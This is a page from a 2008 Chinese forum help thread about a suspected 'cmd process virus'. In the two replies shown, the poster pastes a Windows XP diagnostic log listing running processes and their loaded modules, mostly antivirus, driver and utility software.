12   2  /  2  页   跳转

[求助] cmd进程病毒

收藏
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-02 22:09 | 显示全部 短消息 资料
字号: 11楼

回复:cmd进程病毒

[PID: 2852 / LOCAL SERVICE][C:\WINDOWS\System32\SCardSvr.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2113)]
[PID: 2936 / Administrator][C:\WINDOWS\ATK0100\HControl.exe]  [, 1043, 2, 15, 65]
    [C:\WINDOWS\ATK0100\CMSSC.dll]  [N/A, ]
    [C:\WINDOWS\ATK0100\inter_f2.dll]  [ATK, 1043, 2, 15, 52]
    [C:\WINDOWS\ATK0100\ATKWLIOC.DLL]  [ACTIONTEC Electronics,Inc, 2.01.02]
    [C:\WINDOWS\ATK0100\SiSPkt.dll]  [Silicon Integrated Systems Corp., 1, 0, 0, 45]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\SynCOM.dll]  [Synaptics, Inc., 8.3.5 25May06]
[PID: 3060 / Administrator][C:\Program Files\Rising\Rav\RavTask.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.24]
    [C:\Program Files\Rising\Rav\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\RSAPPMGR.DLL]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
[PID: 3352 / Administrator][C:\Program Files\Synaptics\SynTP\SynTPEnh.exe]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\WINDOWS\system32\SynCOM.dll]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\WINDOWS\system32\SynTPAPI.dll]  [Synaptics, Inc., 8.3.5 25May06]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
[PID: 3616 / Administrator][C:\WINDOWS\ATK0100\ATKOSD.exe]  [, 1043, 2, 15, 63]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3636 / SYSTEM][C:\WINDOWS\System32\svchost.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2111)]
[PID: 3840 / Administrator][C:\Program Files\Wireless Console 2\wcourier.exe]  [, 2, 0, 10, 0]
    [C:\Program Files\Wireless Console 2\MSVCR80.dll]  [Microsoft Corporation, 8.00.50727.762]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3984 / Administrator][C:\WINDOWS\system32\ctfmon.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
[PID: 4000 / Administrator][C:\Program Files\DAEMON Tools Lite\daemon.exe]  [DT Soft Ltd, 4.12.2.0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\DAEMON Tools Lite\DaemonPlugin.dll]  [DT Soft Ltd, 4.12.0.0]
    [C:\Program Files\DAEMON Tools Lite\daemon.dll]  [DT Soft Ltd., 4.12.0.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
    [C:\Program Files\DAEMON Tools Lite\Lang\CHS.dll]  [N/A, ]
    [C:\Program Files\DAEMON Tools Lite\Lang\ENU.dll]  [N/A, ]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\bw5mount.dll]  [, 1.1.3.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\bwtmount.dll]  [DT Soft Ltd., 1.01.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\ccdmount.dll]  [DT Soft Ltd., 1.10.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\cuemount.dll]  [DT Soft Ltd., 1.02.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\iszmount.dll]  [DT Soft Ltd., 1.03.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\nrgmount.dll]  [DT Soft Ltd., 1.12.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\pdimount.dll]  [DT Soft Ltd., 1.01.0.0]
    [C:\Program Files\DAEMON Tools Lite\Plugins\Images\pfcmount.dll]  [DT Soft Ltd., 1.00.0.0]
    [C:\Program Files\DAEMON Tools Lite\pfctoc.dll]  [Padus(R), Inc., 1, 0, 0, 12]
[PID: 4020 / Administrator][C:\Program Files\Microsoft ActiveSync\wcescomm.exe]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\CEUTIL.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\RAPI.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Microsoft ActiveSync\TCP2UDP.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Microsoft ActiveSync\dtptdns.dll]  [Microsoft Corporation, 4.5.5096.0]
[PID: 828 / Administrator][C:\PROGRA~1\MICROS~3\rapimgr.exe]  [Microsoft Corporation, 4.5.5096.0]
    [C:\WINDOWS\system32\CEUTIL.dll]  [Microsoft Corporation, 4.5.5096.0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Microsoft ActiveSync\rapiproxystub.dll]  [Microsoft Corporation, 4.5.5096.0]
[PID: 164 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMng.exe]  [TOSHIBA CORPORATION., 5.00.7802.ALL]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosCpsAPI.dll]  [TOSHIBA CORPORATION., 3.01.5520.0]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngHelp.dll]  [TOSHIBA CORPORATION., 5.00.6z01.ALL]
    [C:\WINDOWS\system32\TosAvAPI.dll]  [TOSHIBA CORPORATION., 5.00.6804.0]
    [C:\WINDOWS\system32\TosBtSDDB.dll]  [TOSHIBA CORPORATION., 5.00.7515.0]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtMngLang.dll]  [TOSHIBA CORPORATION., 5.00.6920.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\TosCommAPI.dll]  [N/A, ]
    [C:\WINDOWS\system32\TosLaneAPI.dll]  [TOSHIBA CORPORATION., 1, 0, 3, 0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\LCWizard.dll]  [TOSHIBA CORPORATION, 5.0.0.ALL]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\BtUsrMod.dll]  [TOSHIBA CORPORATION, 1, 01, 11, US]
    [C:\WINDOWS\system32\TosHidAPI.dll]  [TOSHIBA CORPORATION., 4, 0, 1108, 0]
    [C:\WINDOWS\system32\TosGnsAPI.dll]  [TOSHIBA CORPORATION., 5, 0, 0, 0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\TosAcpiAPI.dll]  [TOSHIBA CORPORATION., 1, 0, 3, 0]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtLoad.dll]  [TOSHIBA CORPORATION, 5, 10, 0, 0]
[PID: 2884 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosA2dp.exe]  [TOSHIBA CORPORATION., 5.00.7227.ALL]
    [C:\WINDOWS\system32\TosBtECCAPI.dll]  [TOSHIBA CORPORATION., 3.00.6510.0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\TosAvdtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7410.0]
    [C:\WINDOWS\system32\TosSndAPI.dll]  [TOSHIBA CORPORATION., 5.00.7117.0]
    [C:\WINDOWS\system32\TosSndPlug.dll]  [TOSHIBA CORPORATION., 5.00.7529.ALL]
gototop
 
1234567i
头像
初生襁褓狮
  • 帖子:26
  • 注册: 2005-06-20
  • 来自:
发表于: 2008-09-02 22:10 | 显示全部 短消息 资料
字号: 12楼

回复:cmd进程病毒

[C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 2916 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHid.exe]  [TOSHIBA CORPORATION., 4, 1, 1323, 0]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3160 / Administrator][C:\Program Files\Toshiba\Bluetooth Toshiba Stack\TosBtHsp.exe]  [TOSHIBA CORPORATION., 5.10.05.70426]
    [C:\WINDOWS\system32\TosBtECCAPI.dll]  [TOSHIBA CORPORATION., 3.00.6510.0]
    [C:\WINDOWS\system32\TosBtAPI.dll]  [TOSHIBA CORPORATION., 5.00.7615.0]
    [C:\WINDOWS\system32\TosBdAPI.dll]  [TOSHIBA CORPORATION., 4, 1, 1612, 0]
    [C:\WINDOWS\system32\LCWizard.dll]  [TOSHIBA CORPORATION, 5.0.0.ALL]
    [C:\WINDOWS\system32\TosSndAPI.dll]  [TOSHIBA CORPORATION., 5.00.7117.0]
    [C:\WINDOWS\system32\TosSndPlug.dll]  [TOSHIBA CORPORATION., 5.00.7529.ALL]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 816 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\ravmond.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.80]
    [C:\PROGRAM FILES\RISING\RAV\BWList.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.5]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\PROGRAM FILES\RISING\RAV\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\PROGRAM FILES\RISING\RAV\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\PROGRAM FILES\RISING\RAV\RsLog.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.36]
    [C:\PROGRAM FILES\RISING\RAV\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\MonRule.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
    [C:\PROGRAM FILES\RISING\RAV\Hooksys.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 12]
    [C:\PROGRAM FILES\RISING\RAV\HookReg.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 6]
    [C:\PROGRAM FILES\RISING\RAV\HookNtos.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 5]
    [C:\PROGRAM FILES\RISING\RAV\rswalmon.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
    [C:\PROGRAM FILES\RISING\RAV\recomp.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
    [C:\PROGRAM FILES\RISING\RAV\refs.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
    [C:\PROGRAM FILES\RISING\RAV\ffr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 16]
    [C:\Program Files\Rising\Rav\RsStore.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.9]
    [C:\PROGRAM FILES\RISING\RAV\HookCont.dll]  [Beijing Rising Information Technology Co., Ltd., 22, 0, 0, 3]
    [C:\Program Files\Rising\Rav\fakescan.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.14]
    [C:\Program Files\Rising\Rav\Scanner.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.39]
    [C:\PROGRAM FILES\RISING\RAV\viruslib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\PROGRAM FILES\RISING\RAV\relibldr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\PROGRAM FILES\RISING\RAV\HookWeb.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.3]
    [C:\PROGRAM FILES\RISING\RAV\nvfile.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
    [C:\PROGRAM FILES\RISING\RAV\scanexec.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 22]
    [C:\PROGRAM FILES\RISING\RAV\unexe.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 6]
    [C:\PROGRAM FILES\RISING\RAV\scanex.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\PROGRAM FILES\RISING\RAV\pearc.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 8]
    [C:\PROGRAM FILES\RISING\RAV\scanpack.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
    [C:\PROGRAM FILES\RISING\RAV\revm.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
    [C:\PROGRAM FILES\RISING\RAV\urutils.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 7]
    [C:\PROGRAM FILES\RISING\RAV\ur000.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\extfile.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 32]
    [C:\PROGRAM FILES\RISING\RAV\scansct.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 11]
    [C:\PROGRAM FILES\RISING\RAV\extole.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 13]
    [C:\PROGRAM FILES\RISING\RAV\posttrt.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 24]
    [C:\PROGRAM FILES\RISING\RAV\scriptci.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
    [C:\PROGRAM FILES\RISING\RAV\ur001.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 4]
    [C:\PROGRAM FILES\RISING\RAV\ur023.dat]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 3]
    [C:\PROGRAM FILES\RISING\RAV\uroutine.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\PROGRAM FILES\RISING\RAV\extmail.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 10]
[PID: 3624 / SYSTEM][C:\PROGRAM FILES\RISING\RAV\RavStub.exe]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.10]
    [C:\PROGRAM FILES\RISING\RAV\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\PROGRAM FILES\RISING\RAV\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
[PID: 496 / Administrator][C:\Program Files\Rising\Rav\RAVMON.EXE]  [Beijing Rising Information Technology Co., Ltd., 20.0.01.27]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\Program Files\Rising\Rav\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rav\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\recomp.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 41]
    [C:\Program Files\Rising\Rav\refs.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 18]
    [C:\Program Files\Rising\Rav\viruslib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 27]
    [C:\Program Files\Rising\Rav\relibldr.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rav\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rav\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\Program Files\Rising\Rav\MonRule.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.29]
    [C:\Program Files\Rising\Rav\PngDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
    [C:\Program Files\Rising\Rav\Rsguilib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\Program Files\Rising\Rav\RsXML.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
[PID: 2268 / Administrator][C:\Documents and Settings\Administrator\桌面\Procexp.exe]  [Sysinternals, 10.20]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
[PID: 2504 / Administrator][C:\WINDOWS\system32\conime.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 2816 / Administrator][D:\Program Files\应用\同花顺核新2008\zdsj.exe]  [杭州核新软件技术有限公司, 2008, 7, 1, 0]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [D:\Program Files\应用\同花顺核新2008\RICHED20.dll]  [Microsoft Corporation, 5.30.23.1205]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3992 / Administrator][C:\WINDOWS\system32\notepad.exe]  [Microsoft Corporation, 5.1.2600.5512 (xpsp.080413-2105)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
[PID: 3912 / Administrator][C:\Program Files\Rising\Rfw\RfwCfg.exe]  [Beijing Rising Information Technology Co., Ltd., 7.0.2.62]
    [C:\WINDOWS\system32\MFC71.DLL]  [Microsoft Corporation, 7.10.3077.0]
    [C:\WINDOWS\system32\MSVCR71.dll]  [Microsoft Corporation, 7.10.3052.4]
    [C:\WINDOWS\system32\MSVCP71.dll]  [Microsoft Corporation, 7.10.3077.0]
    [C:\Program Files\Rising\Rfw\RsGuiLib.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 90]
    [C:\Program Files\Rising\Rfw\ProcCom.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rfw\RsCommX2.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 20]
    [C:\Program Files\Rising\Rfw\RSAPPMGR.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.1]
    [C:\Program Files\Rising\Rfw\CfgDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20.0.0.19]
    [C:\Program Files\Rising\Rfw\RSCOMMON.DLL]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 17]
    [C:\Program Files\Rising\Rfw\RfwCtrl.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\Rising\Rfw\ProxyCtr.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.3]
    [C:\Program Files\Rising\Rfw\RsXML.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 2]
    [C:\Program Files\Rising\Rfw\PngDll.dll]  [Beijing Rising Information Technology Co., Ltd., 20, 0, 0, 5]
    [C:\Program Files\Rising\Rfw\RfwRule.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.17]
[PID: 2272 / Administrator][D:\工具\网络\Maxthon2\Maxthon.exe]  [Maxthon International ltd., 2, 1, 0, 1870]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [D:\工具\网络\Maxthon2\mxpp.dll]  [Maxthon International ltd., 1, 0, 0, 107]
    [D:\工具\网络\Maxthon2\MxSk.dll]  [Maxthon, 1, 0, 0, 351]
    [D:\工具\网络\Maxthon2\MxProxy2.dll]  [Maxthon International ltd., 1, 0, 0, 4030]
    [D:\工具\网络\Maxthon2\MxExt.dll]  [N/A, ]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
    [C:\Program Files\360safe\safemon\safemon.dll]  [360.CN, 4, 2, 0, 1005]
    [C:\WINDOWS\system32\APSHook.dll]  [Cognizance Corporation, 2.0.0.015]
    [D:\工具\网络\Maxthon2\mxtool.dll]  [, 1, 0, 0, 1]
    [D:\工具\网络\Maxthon2\maxzlib.dll]  [, 1.2.3]
    [D:\工具\网络\Maxthon2\mxfeedU.dll]  [, 1, 0, 45, 92]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\SFSShell.dll]  [Cognizance Corporation, 1.22.0.239]
    [C:\WINDOWS\system32\MSVCR70.dll]  [Microsoft Corporation, 7.00.9955.0]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\Bin\ItMsg.dll]  [Cognizance Corporation, 1.21.0.410]
    [C:\Program Files\ASUS Security Center\ASUS Security Protect Manager\bin\CHS\SFSShell.dll]  [Cognizance Corporation, 1.22.0.240]
    [D:\工具\网络\Maxthon2\Modules\MxWebBoost\MxWebBoost.dll]  [Maxthon, 1,0,2,1187]
    [D:\工具\网络\Maxthon2\mxdb.dll]  [Max, 3, 5, 3, 125]
    [C:\WINDOWS\system32\ieframe.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\WINDOWS\system32\msacm32.drv]  [Microsoft Corporation, 5.1.2600.0 (xpclient.010817-1148)]
    [C:\WINDOWS\system32\JDWB20.IME]  [五星工作室, 4.00.950]
    [C:\WINDOWS\system32\GOOGLEPINYIN.IME]  [Google Inc., ]
    [C:\WINDOWS\system32\Macromed\Flash\Flash9f.ocx]  [Adobe Systems, Inc., 9,0,124,0]
[PID: 2712 / Administrator][D:\工具\系统工具\系统诊断工具sreng2\SREngPS.EXE]  [Smallfrogs Studio, 2.5.16.900]
    [C:\WINDOWS\system32\Normaliz.dll]  [Microsoft Corporation, 6.0.5441.0 (winmain(wmbla).060628-1735)]
    [C:\WINDOWS\system32\iertutil.dll]  [Microsoft Corporation, 7.00.6000.16705 (vista_gdr.080618-1506)]
    [C:\Program Files\Rising\Rfw\ijt_base.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.21]
    [C:\Program Files\Rising\Rfw\olemon.dll]  [Beijing Rising Information Technology Co., Ltd., 7.0.0.9]
